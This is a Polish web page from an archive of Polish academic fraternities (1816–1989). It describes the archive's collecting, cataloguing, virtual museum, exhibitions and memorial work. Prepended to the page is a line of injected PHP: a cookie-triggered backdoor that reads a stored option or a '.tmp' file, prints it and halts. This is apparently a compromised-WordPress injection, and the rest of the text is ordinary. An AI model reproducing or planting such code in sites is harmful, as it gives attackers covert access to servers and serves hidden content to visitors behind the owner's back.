if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Akcje i działania

Archiwum Korporacyjne zajmuje się historią polskich korporacji akademickich z lat 1816-1989, upowszechnia wiedzę o dziejach i tradycjach korporacyjnych, a także podejmuje działania upamiętniające postaci zmarłych korporantów. Na prace Archiwum składają się następujące działania.

Po pierwsze, gromadzenie wiadomości i pamiątek po przedwojennych korporacjach oraz ich członkach. Dla realizacji tego celu od 2001 r. prowadzona jest akcja poszukiwań wszelkich materialnych śladów po korporacjach akademickich (vide Poszukiwania). Służyło temu także przeprowadzenie w latach 2006-2007 około 60 wywiadów z ostatnimi żyjącymi przedwojennymi korporantami (vide Ostatni Filistrzy).

Po drugie, porządkowane, opisywanie i katalogowane zebranych wiadomości i pamiątek po korporacjach akademickich i ich członkach. W tym celu na stronach Archiwum i Muzeum Polskich Korporacji Akademickich prezentowanych jest kilkaset odnalezionych fotografii, których nie udało się w ogóle, bądź w zadowalającym stopniu opisać (vide Identyfikacja fotografii). Ponadto zgromadzone insygnia, dokumenty oraz fotografie są w miarę możliwości poddawane odpowiedniej konserwacji.

Po trzecie, prezentowanie zgromadzonych zbiorów oraz ich udostępnianie wszystkim zainteresowanym. Służy temu przede wszystkim otwarte w 2007 r. wirtualne Muzeum Polskich Korporacji Akademickich (vide Muzeum), jak także organizacja wystaw poświęconych historii polskich korporacji akademickich (vide Wystawy). Ponadto od samego początku działania Archiwum gromadzone zbiory są wykorzystywane przy reaktywacji kolejnych korporacji akademickich (vide Reaktywacje korporacji) oraz udostępniane naukowcom, dziennikarzom, rodzinom przedwojennych korporantów, czynnie działającym korporacjom, a także innym instytucjom i osobom zainteresowanym historią polskiego ruchu korporacyjnego, dziejami poszczególnych korporacji oraz losami ich członków. (vide Udostępnianie zbiorów).

Po czwarte, upamiętnianie działalności polskich korporacji akademickich oraz ich członków (vide Tablice pamiątkowe).

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 29 XI 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }